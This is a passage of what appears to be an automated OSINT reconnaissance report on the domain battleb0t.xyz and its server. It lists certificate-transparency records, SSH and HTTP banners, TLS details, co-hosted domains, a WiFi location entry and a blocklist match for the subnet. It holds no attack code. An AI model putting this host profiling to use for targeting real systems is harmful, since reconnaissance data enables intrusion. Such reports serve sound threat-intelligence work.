u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | U+ACN (Net ID: 00:02:A8:81:E3:26) | 50.1188, 8.6843 |
| 2023-05-12 03:04:07 | Malicious IP on Same Subnet | Yes | Greensnow | 0 | 0 | 4 | 0 | None | greensnow.co [165.232.112.0/20]
https://blocklist.greensnow.co/greensnow.txt | 165.232.112.0/20 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5e4216390f2caf-ORD"]} | 188.114.96.1 |
| 2023-05-12 02:54:14 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html | kekw.battleb0t.xyz |
| 2023-05-12 02:52:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:83:25:66:25:1a:3d:8f:56:ff:c6:08:d8:7f:3e:06:71:b1:
38:70:e3:fc:72:2a:2d:17:39:ae:84:7f:28:90:6f:b9:3a:53:
70:c6:b9:f9:5c:8e:b6:f6:c9:24:b6:77:0f:70:91:82:5f:ac:
56:6c:08:4c:23:f5:3c:83:00:83:99:51:65:02:cf:77:c0:85:
ba:ab:a0:9d:95:f2:a4:6b:60:04:68:4d:ab:64:a5:39:13:18:
4b:22:b6:3e:90:a8:e1:cb:6c:80:ed:eb:e8:db:09:6d:7d:c5:
d7:7c:4e:0f:11:9f:9c:8c:8f:a2:2c:66:4c:ea:1f:42:07:c6:
45:55:f4:95:f7:e4:07:4c:aa:76:9c:20:37:d5:34:08:5d:ee:
e2:cf:d2:d6:c0:28:79:06:9f:80:f2:b4:81:17:70:24:de:d7:
df:3a:1c:d8:39:dc:4e:be:14:64:a2:ac:e4:0d:fd:e2:26:1c:
5b:a9:79:86:45:3c:74:3c:8d:5c:cc:03:b8:49:29:86:da:6b:
96:13:a0:71:5d:33:3b:08:b4:30:d2:63:d3:44:80:84:2e:62:
2f:23:c8:e2:cd:24:db:22:f1:8a:aa:49:97:34:12:ee:76:9f:
d2:2b:73:15:a1:ca:90:11:c4:27:df:87:b0:88:a3:ea:c8:db:
d6:03:72:a5
| battleb0t.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | kekw.battleb0t.xyz | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": 